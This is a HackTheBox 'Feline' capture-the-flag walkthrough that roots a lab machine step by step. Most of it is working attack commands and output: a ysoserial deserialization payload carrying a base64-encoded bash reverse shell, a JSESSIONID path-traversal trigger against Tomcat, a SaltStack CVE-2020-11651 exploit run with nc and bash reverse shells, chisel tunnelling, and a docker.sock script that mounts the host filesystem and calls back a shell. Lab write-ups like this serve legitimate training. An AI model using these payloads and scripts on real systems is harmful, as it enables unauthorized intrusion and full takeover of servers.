FELINE HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-04 12:13 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating Ping Scan at 12:14
Scanning 10.10.10.205 [4 ports]
Completed Ping Scan at 12:14, 0.56s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:14
Scanning feline.htb (10.10.10.205) [1000 ports]
Discovered open port 8080/tcp on 10.10.10.205
Discovered open port 22/tcp on 10.10.10.205
Completed SYN Stealth Scan at 12:14, 3.61s elapsed (1000 total ports)
Initiating Service scan at 12:14
Scanning 2 services on feline.htb (10.10.10.205)
Completed Service scan at 12:14, 8.85s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against feline.htb (10.10.10.205)
Retrying OS detection (try #2) against feline.htb (10.10.10.205)
Retrying OS detection (try #3) against feline.htb (10.10.10.205)
Retrying OS detection (try #4) against feline.htb (10.10.10.205)
Retrying OS detection (try #5) against feline.htb (10.10.10.205)
Initiating Traceroute at 12:14
Completed Traceroute at 12:14, 0.48s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:14
Completed Parallel DNS resolution of 2 hosts. at 12:14, 0.41s elapsed
NSE: Script scanning 10.10.10.205.
Initiating NSE at 12:14
Completed NSE at 12:14, 11.08s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 1.22s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Nmap scan report for feline.htb (10.10.10.205)
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache Tomcat 9.0.27
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: VirusBucket
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/4%OT=22%CT=1%CU=41377%PV=Y%DS=2%DC=T%G=Y%TM=5F51E25D
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N
OS:W7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R
OS:=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)

Uptime guess: 22.689 days (since Wed Aug 12 19:42:43 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   474.94 ms 10.10.14.1
2   475.12 ms feline.htb (10.10.10.205)

NSE: Script Post-scanning.
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.52 seconds
           Raw packets sent: 1159 (55.038KB) | Rcvd: 1121 (48.462KB)

PORT 8080

HOME PAGE

SERVICE PAGE

Now Here we can upload files so lets get this through burp

Here we will see that file can easily be uploaded but main thing is its destination so try hit and trial where I just removed the filename to see whats will happen if we do that and we will get output like this

As Now here we know the upload directory and we know that our webpage is tomcat one which we need to exploit that for that i got variuos websites from where we can take help

As of now we will be using java Deserialization attack for our tomcat to trigger the uploaded file but before that we will need to upload that to webpage with session extension as JSESSION COOKIE wil be triggering only session exntended files

So links from where you can read about this and clone repos are

https://medium.com/swlh/hacking-java-deserialization-7625c8450334

https://github.com/breaktoprotect/CVE-2017-12615

https://github.com/masahiro331/CVE-2020-9484

Now here we also need to download ysoserial jar file so for that link is

https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

Now just get all these files and read out and then we will be using these commands

USER ACCESS

First lets make a java exploit command part with session extension

First create a command script to be executed

echo “bash -i >& /dev/tcp/10.10.14.167/9002 0>&1” | base64

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNjcvOTAwMiAwPiYxCg==}|{base64,-d}|{bash,-i}

In above 2 commands we have used base64 part to execute these scripts as through base64 we will not need to face errors for symbols and space in reverse shell commands so thats we have used base64 secondly it is the only way for java Deserialization attack

Secondly to create a file with session extension

java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNjcvOTAwMiAwPiYxCg==}|{base64,-d}|{bash,-i}” > liquidrage.session

Here it will generate a session file using ysoserial jar file which is used to create payloads for that

Now just upload that session file through webpage

and then we will be triggering that to get our shell

So after uploading your file run this command

curl -sS ‘http://feline.htb:8080/upload.jsp’ -H “Cookie:JSESSIONID=../../../opt/samples/uploads/liquidrage” > /dev/null

My reverse shell

┌─[root@liquid]─[~/Desktop/HTB/feline]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 48714
bash: cannot set terminal process group (932): Inappropriate ioctl for device
bash: no job control in this shell
tomcat@VirusBucket:/opt/tomcat$ id
id
uid=1000(tomcat) gid=1000(tomcat) groups=1000(tomcat)
tomcat@VirusBucket:/opt/tomcat$ cd
cd
tomcat@VirusBucket:~$ cat user.txt
cat user.txt
f50498c09383bb0c245da7098ebc5d3a
tomcat@VirusBucket:~$ 

Now here we got USER ACCESS

ROOT ACCESS

Lets check all the ports available right now

tomcat@VirusBucket:~$ netstat -ltn
netstat -ltn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.1:36533         0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:4505          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:4506          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN     
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN     
tcp6       0      0 :::8080                 :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tomcat@VirusBucket:~$ 

Now we all know that port 4505 4506 are saltstack ones

Lets get its exploit on google

https://github.com/jasperla/CVE-2020-11651-poc

Here we got exploit but we cannot use it in this shell as we need to import some modules which we cannot do their

So as usual lets get chisel out and forward this to our machine

To download and install chisel follow me along

https://github.com/jpillora/chisel

Command to run to get chisel executable

cd chisel

go build

Now you will have chisel but its large file so to decrease the size of file

┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #go build -ldflags="-s -w"
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #upx build chisel 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: build: FileNotFoundException: build: No such file or directory
   9555968 ->   3833252   40.11%   linux/amd64   chisel                        

Packed 1 file.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #du -hs chisel 
3.7M	chisel

Now just transfer the file and get server up for port forward

tomcat@VirusBucket:/tmp$ chmod +x chisel
chmod +x chisel
tomcat@VirusBucket:/tmp$ ./chisel client 10.10.14.167:9004 R:4506:127.0.0.1:4506
<isel client 10.10.14.167:9004 R:4506:127.0.0.1:4506
2020/09/04 05:33:52 client: Connecting to ws://10.10.14.167:9004
2020/09/04 05:33:54 client: Fingerprint 76:85:e6:4d:bb:72:b8:a9:cd:ef:07:b0:51:3a:be:01
2020/09/04 05:33:55 client: Connected (Latency 414.88223ms)

chisel server response

┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #./chisel server -p 9004 --reverse
2020/09/04 10:57:19 server: Reverse tunnelling enabled
2020/09/04 10:57:19 server: Fingerprint 76:85:e6:4d:bb:72:b8:a9:cd:ef:07:b0:51:3a:be:01
2020/09/04 10:57:19 server: Listening on http://0.0.0.0:9004
2020/09/04 10:57:23 server: session#1: tun: proxy#R:4506=>4506: Listening

now lets run that script right away

Now to run that we need to import salt module

pip3 install salt

now lets get shell as mentioned in POC

┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc]
└──╼ #python3 exploit.py --master 127.0.0.1 --exec "nc 127.0.0.1 9005 -e /bin/sh" 
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (127.0.0.1:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: NdhkLm4xlo/nfaw+mtVJsuY+SqyJwGWaLx8189/vjbwRfNLUwCce5YFnJGcZsg9AaJuVCvZiBPQ=
[+] Attemping to execute nc 127.0.0.1 9005 -e /bin/sh on 127.0.0.1
[+] Successfully scheduled job: 20200904055046865589
┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc]
└──╼ #python3 exploit.py --master 127.0.0.1 --exec 'bash -c "bash -i >& /dev/tcp/10.10.14.167/9005 0>&1"' 
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (127.0.0.1:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: NdhkLm4xlo/nfaw+mtVJsuY+SqyJwGWaLx8189/vjbwRfNLUwCce5YFnJGcZsg9AaJuVCvZiBPQ=
[+] Attemping to execute bash -c "bash -i >& /dev/tcp/10.10.14.167/9005 0>&1" on 127.0.0.1
[+] Successfully scheduled job: 20200904055201158560

Here above i tried nc which didn’t work but bash rev shell worked perfectly

My Reverse shell

┌─[root@liquid]─[~/Desktop/HTB/feline/chisel/CVE-2020-11651-poc]
└──╼ #nc -lnvp 9005
listening on [any] 9005 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 49746
bash: cannot set terminal process group (2095): Inappropriate ioctl for device
bash: no job control in this shell
root@2d24bf61767c:~#

But here we are in docker

Now Here in bash history we are given docker.sock which is odd and this docker is running SSH server

So here we will be creating a new docker image and mounting all data from previous one to here including root files

So to do that i have a script which i had to take and understand from my friend

#!/bin/bash
pay="bash -c 'bash -i >& /dev/tcp/10.10.14.167/9007 0>&1'"
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$pay\\\"\"]"
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"sandbox\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
revShellContainerID=$(echo "$response" | cut -d'"' -f4)
curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start
sleep 1
curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"

Just transfer this script to that machine and open up you nc server and run this script

┌─[✗]─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #ssh root@127.0.0.1 -i id_rsa 
Linux 2d24bf61767c 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Sep  4 06:07:04 2020 from 127.0.0.1
root@2d24bf61767c:~# wget http://10.10.14.167/exploit.sh
--2020-09-04 06:15:01--  http://10.10.14.167/exploit.sh
Connecting to 10.10.14.167:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 641 [text/x-sh]
Saving to: 'exploit.sh'

exploit.sh                        100%[============================================================>]     641  --.-KB/s    in 0s      

2020-09-04 06:15:02 (45.0 MB/s) - 'exploit.sh' saved [641/641]

root@2d24bf61767c:~# chmod +x exploit.sh 
root@2d24bf61767c:~# ./exploit.sh 
root@2d24bf61767c:~# 

My Reverse Shell

┌─[root@liquid]─[~/Desktop/HTB/feline/chisel]
└──╼ #nc -lnvp 9007
listening on [any] 9007 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.205] 41764
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
groups: cannot find name for group ID 11
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@1dfbcd626cdb:/cd
ls
cd
root@1dfbcd626cdb:~# ls
root.txt
snap
root@1dfbcd626cdb:~# cat ro	
cat root.txt 
2452ed5c64fdb7bf31ab09bf7a9b9140
root@1dfbcd626cdb:~# 

Here we go with our root flag

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: